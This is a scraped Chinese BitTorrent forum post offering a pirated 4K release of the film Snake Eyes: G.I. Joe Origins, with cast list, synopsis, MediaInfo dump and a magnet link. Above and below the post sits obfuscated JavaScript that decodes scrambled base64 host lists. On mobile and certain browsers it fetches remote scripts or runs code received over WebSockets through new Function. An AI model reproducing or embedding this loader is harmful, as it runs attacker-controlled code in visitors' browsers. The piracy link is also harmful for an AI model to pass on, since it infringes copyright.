特种部队:蛇眼起源[简繁字幕].Snake.Eyes.G.I.Joe.Origins.2021.UHD.BluRay.2160p.TrueHD.Atmos.7.1.x265.10bit.HDR 15.49GB

版主小s 1月前 394

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 特种部队:蛇眼起源 / 义勇群英:蛇眼复仇战(港) / 特种部队:蛇眼之战 (台) / 特种部队:蛇眼 / 蛇眼 / Snake Eyes

◎片 名 Snake Eyes: G.I. Joe Origins

◎年 代 2021

◎产 地 加拿大 / 美国

◎类 别 动作 / 科幻 / 冒险

◎语 言 英语

◎上映日期 2021-09(中国大陆) / 2021-07-23(美国)

◎IMDb链接 https://www.imdb.com/title/tt8404256/

◎豆瓣评分 4.3/10 (7592人评价)

◎豆瓣链接 https://movie.douban.com/subject/30396443/

◎片 长 121分钟

◎导 演 罗伯特·斯文克 Robert Schwentke (id:1297058)

◎编 剧 埃文·斯彼里奥托普洛斯 Evan Spiliotopoulos (id:1298164)

乔·施雷普内尔 Joe Shrapnel (id:1354941)

安娜·沃特豪斯 Anna Waterhouse (id:1354942)

◎演 员 亨利·戈尔丁 Henry Golding (id:1392013)

安德鲁·寇吉 Andrew Koji (id:1396495)

伊科·乌艾斯 Iko Uwais (id:1319990)

萨玛拉·维文 Samara Weaving (id:1267671)

乌苏拉·科尔维罗 úrsula Corberó (id:1227369)

安部春香 Haruka Abe (id:1253645)

平岳大 Takehiro Hira (id:1315569)

石田惠理 Eri Ishida (id:1042909)

彼得·门萨 Peter Mensah (id:1040551)

萨缪尔·芬齐 Samuel Finzi (id:1333485)

史蒂文·艾瑞克 Steven Allerick (id:1443005)

马克斯·阿奇博尔德 Max Archibald (id:1459990)

西蒙·钱 Simon Chin (id:1194078)

詹姆斯·廖 James Hiroyuki Liao (id:1316028)

谷垣健治 Kenji Tanigaki (id:1335515)

肖恩·O.罗伯茨 Sean O. Roberts (id:1346349)

贾森·戴 Jason Day (id:1009710)

Hugh Aodh O'Brien Hugh Aodh O'Brien (id:1131487)

迈克尔·盖恩斯 Michael Gaines (id:1284392)

洛伦佐·迪·博纳文图拉 Lorenzo di Bonaventura (id:1282389)

大卫·埃里森 David Ellison (id:1014408)

杰夫·瓦克斯曼 Jeff G. Waxman (id:1458880)

埃里克·豪萨姆 Erik Howsam (id:1458881)

达娜·哥德伯格 Dana Goldberg (id:1458882)

唐·格兰杰 Don Granger (id:1458883)

布莱恩·戈德诺 Brian Goldner (id:1458884)

马丁·托德沙罗 Martin Todsharow (id:1051406)

波扬·巴泽里 Bojan Bazelli (id:1276543)

◎标 签 动作 / 特种部队 / 美国 / 科幻 / 2021 / 漫画改编 / 冒险 / 特工

◎简 介

亨利·戈尔丁饰演一名因背负了复杂过去而隐忍的独行者,代号蛇眼。一次偶然,他救下了岚影一族的准接班人,从而被邀请加入他们在日本的组织。在那里,岚影一族不但教会了蛇眼如何成为一名忍者,也给了他一直想要的一个家。但当蛇眼过去的秘密被逐渐揭开,他的信誉以及对组织的忠诚也将受到考验,即便这会使他会失去最亲近的人的信任。特种部队原著中的经典角色也将在《特种部队:蛇眼起源》中一一亮相。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 210170449487031282184175906862989573511 (0x9E1D5B30875BB272F750ABB5C52BFD87)

  4. Complete name : Snake.Eyes.G.I.Joe.Orig[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 15.5 GiB

  8. Duration : 2 h 1 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 18.3 Mb/s

  11. Encoded date : UTC 2021-10-19 04:16:24

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 2 h 1 min

  22. Bit rate : 13.1 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 608 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0 (Type 2)

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.088

  32. Stream size : 11.1 GiB (72%)

  33. Title : HEVC, [email protected]@High, 24/1.001 fps @ 12666 kbps

  34. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  35. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=3840x1608 / interlace=0 / total-frames=174670 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / repeat-headers / annexb / no-aud / hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=25 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=3 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=1 / chromaloc-top=2 / chromaloc-bottom=2 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(10000000,10) / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  36. Language : English

  37. Default : Yes

  38. Forced : No

  39. Color range : Limited

  40. Color primaries : BT.2020

  41. Transfer characteristics : PQ

  42. Matrix coefficients : BT.2020 non-constant

  43. Mastering display color primaries : Display P3

  44. Mastering display luminance : min: 0.0010 cd/m2, max: 1000 cd/m2


  45. Audio #1

  46. ID : 2

  47. Format : MLP FBA 16-ch

  48. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  49. Commercial name : Dolby TrueHD with Dolby Atmos

  50. Codec ID : A_TRUEHD

  51. Duration : 2 h 1 min

  52. Bit rate mode : Variable

  53. Bit rate : 4 363 kb/s

  54. Maximum bit rate : 7 854 kb/s

  55. Channel(s) : 8 channels

  56. Channel layout : L R C LFE Ls Rs Lb Rb

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 1 200.000 FPS (40 SPF)

  59. Compression mode : Lossless

  60. Stream size : 3.70 GiB (24%)

  61. Title : English Dolby TrueHD 7.1 (Atmos) @ 5003 kbps

  62. Language : English

  63. Default : Yes

  64. Forced : No

  65. Number of dynamic objects : 11

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Audio #2

  69. ID : 3

  70. Format : AC-3

  71. Format/Info : Audio Coding 3

  72. Commercial name : Dolby Digital

  73. Codec ID : A_AC3

  74. Duration : 2 h 1 min

  75. Bit rate mode : Constant

  76. Bit rate : 640 kb/s

  77. Channel(s) : 6 channels

  78. Channel layout : L R C LFE Ls Rs

  79. Sampling rate : 48.0 kHz

  80. Frame rate : 31.250 FPS (1536 SPF)

  81. Compression mode : Lossy

  82. Stream size : 556 MiB (4%)

  83. Title : English Dolby 5.1-EX 5.1 @ 640 kbps

  84. Language : English

  85. Service kind : Complete Main

  86. Default : No

  87. Forced : No


  88. Text #1

  89. ID : 4

  90. Format : PGS

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 52 min

  94. Bit rate : 18.7 kb/s

  95. Count of elements : 1552

  96. Stream size : 15.0 MiB (0%)

  97. Title : Eng/SUP

  98. Language : English

  99. Default : No

  100. Forced : No


  101. Text #2

  102. ID : 5

  103. Format : PGS

  104. Codec ID : S_HDMV/PGS

  105. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  106. Duration : 1 h 52 min

  107. Bit rate : 21.6 kb/s

  108. Count of elements : 1940

  109. Stream size : 17.4 MiB (0%)

  110. Title : Eng/SUP SDH

  111. Language : English

  112. Default : No

  113. Forced : No


  114. Text #3

  115. ID : 6

  116. Format : PGS

  117. Codec ID : S_HDMV/PGS

  118. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  119. Duration : 1 h 54 min

  120. Bit rate : 15.0 kb/s

  121. Count of elements : 1656

  122. Stream size : 12.2 MiB (0%)

  123. Title : Chs/SUP 简体

  124. Language : Chinese

  125. Default : Yes

  126. Forced : No


  127. Text #4

  128. ID : 7

  129. Format : PGS

  130. Codec ID : S_HDMV/PGS

  131. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  132. Duration : 1 h 54 min

  133. Bit rate : 15.5 kb/s

  134. Count of elements : 1656

  135. Stream size : 12.7 MiB (0%)

  136. Title : Cht/SUP 繁体

  137. Language : Chinese

  138. Default : No

  139. Forced : No


  140. Text #5

  141. ID : 8

  142. Format : PGS

  143. Codec ID : S_HDMV/PGS

  144. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  145. Duration : 1 h 54 min

  146. Bit rate : 25.7 kb/s

  147. Count of elements : 1656

  148. Stream size : 21.0 MiB (0%)

  149. Title : Chs/SUP 简英双语

  150. Language : Chinese

  151. Default : No

  152. Forced : No


  153. Text #6

  154. ID : 9

  155. Format : PGS

  156. Codec ID : S_HDMV/PGS

  157. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  158. Duration : 1 h 54 min

  159. Bit rate : 26.2 kb/s

  160. Count of elements : 1656

  161. Stream size : 21.4 MiB (0%)

  162. Title : Cht/SUP 繁英双语

  163. Language : Chinese

  164. Default : No

  165. Forced : No


  166. Menu

  167. 00:00:00.000 : en:第 01 章

  168. 00:10:17.367 : en:第 02 章

  169. 00:19:39.887 : en:第 03 章

  170. 00:28:50.062 : en:第 04 章

  171. 00:37:50.977 : en:第 05 章

  172. 00:43:39.867 : en:第 06 章

  173. 00:54:53.790 : en:第 07 章

  174. 01:03:18.920 : en:第 08 章

  175. 01:14:04.440 : en:第 09 章

  176. 01:23:59.117 : en:第 10 章

  177. 01:29:09.219 : en:第 11 章

  178. 01:36:39.293 : en:第 12 章

  179. 01:46:26.922 : en:第 13 章

  180. 01:53:51.533 : en:第 14 章




复制代码


TAGS 动作 冒险 科幻

磁力链:
  • magnet:?xt=urn:btih:0E8299DF7037E37CBCE6C1544D683D10861CA5E0

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};